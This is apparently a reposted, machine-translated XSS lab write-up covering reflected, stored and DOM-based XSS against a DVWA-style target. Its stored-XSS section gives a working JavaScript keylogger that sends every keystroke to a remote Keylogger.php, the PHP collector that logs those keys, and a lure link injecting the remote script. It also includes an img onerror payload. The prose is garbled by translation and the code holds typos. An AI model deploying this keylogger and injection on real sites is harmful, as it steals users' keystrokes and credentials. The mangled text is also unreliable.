XSSのエクササイズバンドビッグブラザー

反射が0x01

<スクリプト>警告(" ")</ SCRIPT>

あなたは何も濾過を見ることができます

0x02の蓄積型XSS

http:// www.xss_demo.com/st-xss.php

我々はまた、我々は、ネットワークケーブルを追跡しようと成功はナいくつかの乗組員を行うことができます見ることができますか?それが台無しにサーバーを自分に持っていなかった忘れ

document.onkeypress= function(evt){
    evt = evt || window.event
    key = String.fromCharCode(evt.charCode);
    if(key){
        var http = new XMLHttpRequest();
        var param =encodeURL(key);
        http.open("POST","http://192.168.1.102/Keylogger.php",true);
        http.setRequestHeader("Contenet-type","application/x-www-form-urlencoded");
        http.send("key="+param);
    }
}
<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile,"a");
fwrite($fp,$key);
fclose($fp);
?>

攻击语句

<a href="http://192.168.1.102/dwva/vulnerabilities/xss_r/?name=<scripr+src='http://192.168.1.102/Keylogger.js'></script>">诱人字眼</a>

然后随便敲击  成功写入

 

 0X03dom型

<img src=1 onerror=alert('xss')>

成功

おすすめ

転載: www.cnblogs.com/-zhong/p/10966797.html